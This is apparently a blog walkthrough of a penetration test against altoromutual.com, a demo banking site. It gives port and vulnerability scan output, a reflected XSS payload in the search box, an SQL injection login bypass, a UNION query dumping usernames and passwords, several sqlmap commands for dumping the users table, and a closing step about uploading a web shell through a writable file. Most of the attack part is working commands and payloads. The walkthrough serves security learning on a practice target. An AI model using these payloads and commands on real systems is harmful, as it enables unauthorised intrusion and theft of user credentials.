Report www.altotomutual.com:
  1. Find the ip address, add it to scope (burp) and scan the site:
    nikto –h www.altoromutual.com / nmap –sV 65.61.137.117
    Not shown: 997 closed ports
NMAP: PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.0
443/tcp open ssl/http Microsoft IIS httpd 8.0
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

NIKTO:
Retrieved x-powered-by header: ASP.NET
Server: Microsoft-IIS/8.0
Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST



OSVDB-3092: /admin.htm: This might be interesting...
OSVDB-3092: /bank/: This might be interesting...
  1. Checking the website and try to find more information about the application.
  1. Reflected XSS was found in the search box:
    try to insert <script>alert()</script> or <script>a()</script>
    I can find my XSS in the source code.

  1. Try to sign in and view the source.
  2. Try to sign in with invalid username: user’ password: 3456
    we’ve got an error: (another injection point)


     
    try to look inside the error, we have the local application path.

  1. The syntax is false try to find a true syntax and try to sign in
    user' or 1=1-- - (the password is not relevant and we will connect with the first user).





  1. Success! Check the users.

  1. Try to find another injection point on the application,
    insert something to date boxes and check the code.




  2. the script is filtered


    and order by is not working also.
  3. 1 union select 1,2,3,4 from users-- - (Working!)

Try to use: 1 union select 1,username,password,4 from users-- -


There is another way:


  1. Saving the valid (payload) id and password from burp into a file
    uid=* &passw=123&btnSubmit=Login > /tmp/1.log
    1. Use sqlmap to find the users and passwords:sqlmap -l /tmp/1.log --prefix="'" --suffix="-- -" -p uid --technique b
  • DBMS is Microsoft Access.
    1. sqlmap -l /tmp/1.log --prefix="' or 1=1" --suffix="-- -" --technique b --code=302 –tables

sqlmap -l /tmp/1.log --prefix="' or 1=1" --suffix="-- -" --technique b --code=302 -T users -C username --dump
[11:38:21] [WARNING] on Microsoft Access it is not possible to enumerate the user password hashes

Change to:
sqlmap -l /tmp/1.log --prefix="' or 1=1" --suffix="-- -" --technique b --code=302
--common-tables


sqlmap -l /tmp/1.log --prefix="' or 1=1" --suffix="-- -" --technique b --code=302 -T users -C user,password --dump



  1. Looking for a writable location.
Fill the information, stop it with intercept (burp)


check: www.altoromutual.com/comment.txt
we will see the user input there, that mean we have writable point, upload a web shell and encode URL.

Share To:

Fabio Lior Rahamim

Post A Comment: